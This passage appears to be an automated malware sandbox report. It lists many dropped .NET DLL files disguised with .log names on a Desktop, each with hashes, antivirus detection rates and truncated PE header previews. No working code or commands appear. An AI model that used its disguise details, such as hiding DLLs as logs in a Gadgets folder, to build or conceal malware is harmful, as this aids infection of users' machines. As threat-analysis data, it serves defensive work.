                                                                                                                                                                  SHA-512:80924C19FAF3916DB5F71BE5723B6CB7BB7F731DBBA05B8218746F11FB9470F746B7AC581DB398E388377637811319EF8D6841504DC8EA39C510D7CFCD25184C
                                                                                                                                                                  Malicious:true
                                                                                                                                                                  Antivirus:
                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 21%
                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...v..d...........!..................... ........@.. ...............................[....@.................................l...O.................................................................................... ............... ..H............text....~... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........b...;...........a.......................................................................................................................................................................k.X...=.%Cu..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\Desktop\bfAYobhs.log

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):34816
                                                                                                                                                                  Entropy (8bit):5.636032516496583
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:384:JS7LcTqpkHdmLrBmyOLkOPXVcqTZH0uZLSHtciyBDVGehpx3ZPyp1MoCy07G7:J+CaBoXTZH0mUfoGCzpapaFy07
                                                                                                                                                                  MD5:996BD447A16F0A20F238A611484AFE86
                                                                                                                                                                  SHA1:CB0F51CE7FEEE1B5F02D3F13E60D67AF448C478D
                                                                                                                                                                  SHA-256:0CB182B9F8BD0804FC3BBA016926199C536BD7491BA577E089271DC1A63B07BE
                                                                                                                                                                  SHA-512:80924C19FAF3916DB5F71BE5723B6CB7BB7F731DBBA05B8218746F11FB9470F746B7AC581DB398E388377637811319EF8D6841504DC8EA39C510D7CFCD25184C
                                                                                                                                                                  Malicious:true
                                                                                                                                                                  Antivirus:
                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 21%
                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...v..d...........!..................... ........@.. ...............................[....@.................................l...O.................................................................................... ............... ..H............text....~... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........b...;...........a.......................................................................................................................................................................k.X...=.%Cu..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\Desktop\cNtGaFop.log

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):89600
                                                                                                                                                                  Entropy (8bit):5.905167202474779
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:1536:mspaoWV6yRfXRFHJh/fLiSI82VawF1YBJcqe:1paoWMy5XXnfXf2YSYBJcqe
                                                                                                                                                                  MD5:06442F43E1001D860C8A19A752F19085
                                                                                                                                                                  SHA1:9FBDC199E56BC7371292AA1A25CF4F8A6F49BB6D
                                                                                                                                                                  SHA-256:6FB2FAAC08F55BDF18F3FCEE44C383B877F416B97085DBEE4746300723F3304F
                                                                                                                                                                  SHA-512:3592162D6D7F0B298C2D277942F9C7E86A29078A4D7B73903183C97DACABC87E0523F0EF992F2BD7350AA8AE9D49910B3CE199BC4103F7DC268BF319293CD577
                                                                                                                                                                  Malicious:true
                                                                                                                                                                  Antivirus:
                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 16%
                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......g.........." .....V...........t... ........@.. ....................................@.................................pt..K.......l............................................................................ ............... ..H............text....T... ...V.................. ..`.rsrc...l............X..............@..@.reloc...............\..............@..B.................t......H.......H...(q..........P.........................................................................n$..Fr.....fQ...M.:..'k.m.(G.c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW....

                                                                                                                                                                  C:\Users\user\Desktop\eYPHaYTq.log

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):32256
                                                                                                                                                                  Entropy (8bit):5.631194486392901
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                                                                                                                                  MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                                                                                                                                  SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                                                                                                                                  SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                                                                                                                                  SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                                                                                                                                  Malicious:true
                                                                                                                                                                  Antivirus:
                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 25%
                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\Desktop\fijXRHyU.log

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Users\user\Desktop\zZ1Y43bxxV.exe
                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):32768
                                                                                                                                                                  Entropy (8bit):5.645950918301459
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:384:fRDtCEPOaiRBCSzHADW8S3YVDOy6Vgh/UaFTKqrPd62GTB7ZyTG4sTaG:fR/IMEACDoJ86/UoTKqZwJ8TG4
                                                                                                                                                                  MD5:E84DCD8370FAC91DE71DEF8DCF09BFEC
                                                                                                                                                                  SHA1:2E73453750A36FD3611D5007BBB26A39DDF5F190
                                                                                                                                                                  SHA-256:DD7AC164E789CAD96D30930EFE9BBA99698473EDEA38252C2C0EA44043FB1DB5
                                                                                                                                                                  SHA-512:77461BA74518E6AE9572EC916499058F45D0576535C20FAE74D0CB904DC79ED668B94885BFC38E24D5DEEAE7FBEF79B768216F1422B2178277DBD3209FC2AFD9
                                                                                                                                                                  Malicious:true
                                                                                                                                                                  Antivirus:
                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 29%
                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.../6.d...........!.....x............... ........@.. ..............................<.....@....................................W.................................................................................... ............... ..H............text...4v... ...x.................. ..`.rsrc................z..............@..@.reloc...............~..............@..B........................H........e..L0...........c......................................................................................................................................................................o.<.....r%.2.D..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\Desktop\frGXBuRR.log

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Users\user\Desktop\zZ1Y43bxxV.exe
                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):33280
                                                                                                                                                                  Entropy (8bit):5.634433516692816
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:384:TVyNAbQWfDL/QwV/AnmqieB2Ht50uVVxg+94HoxMttjICAQgEYhfAcGQMrygg4Ty:TKWfYwV2u3xg+94HoSbTY4f2gfcab
                                                                                                                                                                  MD5:0D323E1CACEA89CAA5DDEAF2F37BCA69
                                                                                                                                                                  SHA1:4769C3E947D02A1FD548BE64013F520D571D96E1
                                                                                                                                                                  SHA-256:873E7688D95DCAA5468BF94063A94C548EF0D8BE9D4111F1917DA482DBC2A64C
                                                                                                                                                                  SHA-512:73F4EDE6D4C62997A4F11AD09A12DFD0BFD749026209E63E52F9D979F9423FDD640E96FA59D51556001C4BE22888E59C67781970649387AF090E26AC40C0C0DE
                                                                                                                                                                  Malicious:true
                                                                                                                                                                  Antivirus:
                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 8%
                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...k..d...........!.....z............... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....y... ...z.................. ..`.rsrc................|..............@..@.reloc..............................@..B........................H.......@`..(9..........._......................................................................................................................................................................V.4...W..e..&&................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\Desktop\iGWfDlte.log

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):38400
                                                                                                                                                                  Entropy (8bit):5.699005826018714
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:768:bvTf5JA7rmkHDkK6/X7rpCA0U4oW+YcSNdb/deQoCDKmc:bTffImkjkK6/QAhaceb/dum
                                                                                                                                                                  MD5:87765D141228784AE91334BAE25AD743
                                                                                                                                                                  SHA1:442BA48B1B5BB158E2E6145B0592F81D20CB9C57
                                                                                                                                                                  SHA-256:9A121719F71383CF66FC36453679B36C8D24CC61EB335D0C304536E5D72AAAEB
                                                                                                                                                                  SHA-512:77FF7244F4E181A1F2B69A8814E1EFC0B7B55CD551B8D22F5A08039156295F6417D0E2E58265F1C07F8EA2BA3B24D9810B4B3E91B13943688C7450F736746657
                                                                                                                                                                  Malicious:true
                                                                                                                                                                  Antivirus:
                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 25%
                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...c..d...........!..................... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......Dm...?..........<l......................................................................................................................................................................Q[..u.......;..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\Desktop\iOGyhUTj.log

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):126976
                                                                                                                                                                  Entropy (8bit):6.057993947082715
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3072:V2IJq7YkHFJwBTZtHrC/0/FHkINvdF+nTCkjk1U+1:V2IJq7YbrFHkIrgnTQ
                                                                                                                                                                  MD5:16B480082780CC1D8C23FB05468F64E7
                                                                                                                                                                  SHA1:6FDDF86F9F0FBAA189F5CB79E44999A3F1AC2B26
                                                                                                                                                                  SHA-256:7A080D8BD178EC02C7F39F7F941479074C450C4FDD8E963C993D2FB5537C7708
                                                                                                                                                                  SHA-512:A165BB5D7972DE124F670BCAC20B4A46727B7CF27D1ED925D02F7CC7C79D7D04122D7C202C67D7EAE798348E8D481F085282EB5B89D84B902607D7EB1155BA19
                                                                                                                                                                  Malicious:true
                                                                                                                                                                  Antivirus:
                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 21%
                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ..................... ... ....@.. .......................`......:.....@.....................................O.... .......................@....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H...........(...........<...h.........................................................@.......0.................................................................................................................................Y........;~..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................

                                                                                                                                                                  C:\Users\user\Desktop\jUEFnHBb.log

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):294912
                                                                                                                                                                  Entropy (8bit):6.010605469502259
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:6144:f5M1rY+WGzK4NGSAhWj1dVV6cTl06YX6w/xHtRoNF:fuzzAWlvYXDRoNF
                                                                                                                                                                  MD5:00574FB20124EAFD40DC945EC86CA59C
                                                                                                                                                                  SHA1:8B96C4B6F450E711085AE7B22517C195222ACFDF
                                                                                                                                                                  SHA-256:3A0C38E5DC41A8D668EBDD9368CEE89F4991350E6967A9715CAE8F36E0D032BB
                                                                                                                                                                  SHA-512:B578007ECDCEC0D7A3A09F7E5D681A724FE2749CB46B58F5D5C96E88CAAC03C4570BB67F47BC45F01B9A47966086CC08DACB691AA2D26AD0262DC1257F7CA837
                                                                                                                                                                  Malicious:true
                                                                                                                                                                  Antivirus:
                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 17%
                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....x............... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text....v... ...x.................. ..`.rsrc................z..............@..@.reloc...............~..............@..B.......................H........y...............Z..............................................P...........W...........S...........[...........Q...........Y...........U.......A...]........@..P...........X...........T.......!...\........ ..R...........Z...........V....................`..P...........W...........S...........[...........Q...........Y...........U.......a...]........`..P...........X...........T.......1...\........0..R...........Z...........V....................`..........................

                                                                                                                                                                  C:\Users\user\Desktop\jeYWdqhF.log

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Users\user\Desktop\zZ1Y43bxxV.exe
                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):294912
                                                                                                                                                                  Entropy (8bit):6.010605469502259
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:6144:f5M1rY+WGzK4NGSAhWj1dVV6cTl06YX6w/xHtRoNF:fuzzAWlvYXDRoNF
                                                                                                                                                                  MD5:00574FB20124EAFD40DC945EC86CA59C
                                                                                                                                                                  SHA1:8B96C4B6F450E711085AE7B22517C195222ACFDF
                                                                                                                                                                  SHA-256:3A0C38E5DC41A8D668EBDD9368CEE89F4991350E6967A9715CAE8F36E0D032BB
                                                                                                                                                                  SHA-512:B578007ECDCEC0D7A3A09F7E5D681A724FE2749CB46B58F5D5C96E88CAAC03C4570BB67F47BC45F01B9A47966086CC08DACB691AA2D26AD0262DC1257F7CA837
                                                                                                                                                                  Malicious:true
                                                                                                                                                                  Antivirus:
                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 17%
                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....x............... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text....v... ...x.................. ..`.rsrc................z..............@..@.reloc...............~..............@..B.......................H........y...............Z..............................................P...........W...........S...........[...........Q...........Y...........U.......A...]........@..P...........X...........T.......!...\........ ..R...........Z...........V....................`..P...........W...........S...........[...........Q...........Y...........U.......a...]........`..P...........X...........T.......1...\........0..R...........Z...........V....................`..........................

                                                                                                                                                                  C:\Users\user\Desktop\kdkoYnoN.log

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Users\user\Desktop\zZ1Y43bxxV.exe
                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):38912
                                                                                                                                                                  Entropy (8bit):5.679286635687991
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:768:RH9nQF3DwRvGTYLOFbL79ed5l8UNebCPncg:TyDF0PybCPn
                                                                                                                                                                  MD5:9E910782CA3E88B3F87826609A21A54E
                                                                                                                                                                  SHA1:8DBC333244620EDA5D3F1C9EAA6B924455262303
                                                                                                                                                                  SHA-256:3B311986251EE5A303671108AFBAF43E0255C4CAE1C26CC9600BB0C7D22D3864
                                                                                                                                                                  SHA-512:592981359F46BBC577BE99DEFE3E2A17998BA2882AAAA20107841BCA97C2121CB97C45BC6EDBFC3F430D31450457CD855751727922AB4BB1A3C12DA050EEC057
                                                                                                                                                                  Malicious:true
                                                                                                                                                                  Antivirus:
                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 8%
                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........k..hC...........j......................................................................................................................................................................`..~...CE.w#'..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\Desktop\lJFefRJG.log

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Users\user\Desktop\zZ1Y43bxxV.exe
                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):89600
                                                                                                                                                                  Entropy (8bit):5.905167202474779
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:1536:mspaoWV6yRfXRFHJh/fLiSI82VawF1YBJcqe:1paoWMy5XXnfXf2YSYBJcqe
                                                                                                                                                                  MD5:06442F43E1001D860C8A19A752F19085
                                                                                                                                                                  SHA1:9FBDC199E56BC7371292AA1A25CF4F8A6F49BB6D
                                                                                                                                                                  SHA-256:6FB2FAAC08F55BDF18F3FCEE44C383B877F416B97085DBEE4746300723F3304F
                                                                                                                                                                  SHA-512:3592162D6D7F0B298C2D277942F9C7E86A29078A4D7B73903183C97DACABC87E0523F0EF992F2BD7350AA8AE9D49910B3CE199BC4103F7DC268BF319293CD577
                                                                                                                                                                  Malicious:true
                                                                                                                                                                  Antivirus:
                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 16%
                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......g.........." .....V...........t... ........@.. ....................................@.................................pt..K.......l............................................................................ ............... ..H............text....T... ...V.................. ..`.rsrc...l............X..............@..@.reloc...............\..............@..B.................t......H.......H...(q..........P.........................................................................n$..Fr.....fQ...M.:..'k.m.(G.c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW....

                                                                                                                                                                  C:\Users\user\Desktop\mpuXdJMF.log

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Users\user\Desktop\zZ1Y43bxxV.exe
                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):24576
                                                                                                                                                                  Entropy (8bit):5.535426842040921
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:384:aShD1nf4AeGAJVdBb9h2d7WNrFBo29TZHD1qPPPPPDPC2C6/Xa3c4J9UbWr4e169:aSPUrJVH94sDBLVZHxqPPPPPDPC2C6/X
                                                                                                                                                                  MD5:5420053AF2D273C456FB46C2CDD68F64
                                                                                                                                                                  SHA1:EA1808D7A8C401A68097353BB51A85F1225B429C
                                                                                                                                                                  SHA-256:A4DFD8B1735598699A410538B8B2ACE6C9A68631D2A26FBF8089D6537DBB30F2
                                                                                                                                                                  SHA-512:DD4C7625A1E8222286CE8DD3FC94B7C0A053B1AD3BF28D848C65E846D04A721EA4BFFAFA234A4A96AB218CEE3FC1F5788E996C6A6DD56E5A9AB41158131DFD4B
                                                                                                                                                                  Malicious:true
                                                                                                                                                                  Antivirus:
                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 17%
                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...a..e...........!.....X...........w... ........@.. ....................................@..................................v..W.................................................................................... ............... ..H............text...$W... ...X.................. ..`.rsrc................Z..............@..@.reloc...............^..............@..B.................w......H........Q..D%...........P........................................................................................................................................................................pw.&..l%\....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\Desktop\nUbffkpH.log

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Users\user\Desktop\zZ1Y43bxxV.exe
                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):32256
                                                                                                                                                                  Entropy (8bit):5.631194486392901
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                                                                                                                                  MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                                                                                                                                  SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                                                                                                                                  SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                                                                                                                                  SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                                                                                                                                  Malicious:true
                                                                                                                                                                  Antivirus:
                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 25%
                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\Desktop\oyzEfRxS.log

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):50176
                                                                                                                                                                  Entropy (8bit):5.723168999026349
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:768:7PCvZsxIexhaqgbv8yGk/A/4NPmAQeMeYzlP58gH8zGTCWxttXyZPM:7P4ZsxIelkY/O+DeuzYbM5xXiE
                                                                                                                                                                  MD5:2E116FC64103D0F0CF47890FD571561E
                                                                                                                                                                  SHA1:3EF08A9B057D1876C24FC76E937CDA461FAC6071
                                                                                                                                                                  SHA-256:25EEEA99DCA05BF7651264FA0C07E0E91D89E0DA401C387284E9BE9AFDF79625
                                                                                                                                                                  SHA-512:39D09DE00E738B01B6D8D423BA05C61D08E281482C83835F4C88D2F87E6E0536DDC0101872CBD97C30F977BC223DFAE9FCB3DB71DD8078B7EB5B5A4D0D5207A8
                                                                                                                                                                  Malicious:true
                                                                                                                                                                  Antivirus:
                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 17%
                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................... .......e....@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............M...................................................................................................................................................................................Xg;.6.'.1. b9g................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\Desktop\rLFDskhr.log

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Users\user\Desktop\zZ1Y43bxxV.exe
                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):46592
                                                                                                                                                                  Entropy (8bit):5.870612048031897
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:768:kEXtbvrhKJukN9LCewFI4eYWza7q9GYBAfNhgi2keA1RLaew5trbNM:NhKZEq4hWO7cAfN6DdA1R9w5x
                                                                                                                                                                  MD5:3601048DFB8C4A69313A593E74E5A2DE
                                                                                                                                                                  SHA1:A36A9842EA2D43D7ED024FFB936B4E9AE6E90338
                                                                                                                                                                  SHA-256:F5F1BA9E344B2F2E9CF90978C6D3518DFB55B316489E360874E3A1144BAC3C05
                                                                                                                                                                  SHA-512:B619A3D2C5CFADDEC234471FF68F96F19CFBBB5491439C3EE3593E0B2B6F995EBDC208563CC1B04FA383A983540646D02681B0CC039595C1845FE8F7941ABB23
                                                                                                                                                                  Malicious:true
                                                                                                                                                                  Antivirus:
                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 5%
                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...j..d...........!..................... ........@.. ....................... .......h....@.....................................S.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............K...........w.................................................................................................................................................................................$A.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\Desktop\rpqvmOyM.log

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):38912
                                                                                                                                                                  Entropy (8bit):5.679286635687991
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:768:RH9nQF3DwRvGTYLOFbL79ed5l8UNebCPncg:TyDF0PybCPn
                                                                                                                                                                  MD5:9E910782CA3E88B3F87826609A21A54E
                                                                                                                                                                  SHA1:8DBC333244620EDA5D3F1C9EAA6B924455262303
                                                                                                                                                                  SHA-256:3B311986251EE5A303671108AFBAF43E0255C4CAE1C26CC9600BB0C7D22D3864
                                                                                                                                                                  SHA-512:592981359F46BBC577BE99DEFE3E2A17998BA2882AAAA20107841BCA97C2121CB97C45BC6EDBFC3F430D31450457CD855751727922AB4BB1A3C12DA050EEC057
                                                                                                                                                                  Malicious:true
                                                                                                                                                                  Antivirus:
                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 8%
                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........k..hC...........j......................................................................................................................................................................`..~...CE.w#'..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\Desktop\urceIxCH.log

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):46592
                                                                                                                                                                  Entropy (8bit):5.870612048031897
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:768:kEXtbvrhKJukN9LCewFI4eYWza7q9GYBAfNhgi2keA1RLaew5trbNM:NhKZEq4hWO7cAfN6DdA1R9w5x
                                                                                                                                                                  MD5:3601048DFB8C4A69313A593E74E5A2DE
                                                                                                                                                                  SHA1:A36A9842EA2D43D7ED024FFB936B4E9AE6E90338
                                                                                                                                                                  SHA-256:F5F1BA9E344B2F2E9CF90978C6D3518DFB55B316489E360874E3A1144BAC3C05
                                                                                                                                                                  SHA-512:B619A3D2C5CFADDEC234471FF68F96F19CFBBB5491439C3EE3593E0B2B6F995EBDC208563CC1B04FA383A983540646D02681B0CC039595C1845FE8F7941ABB23
                                                                                                                                                                  Malicious:true
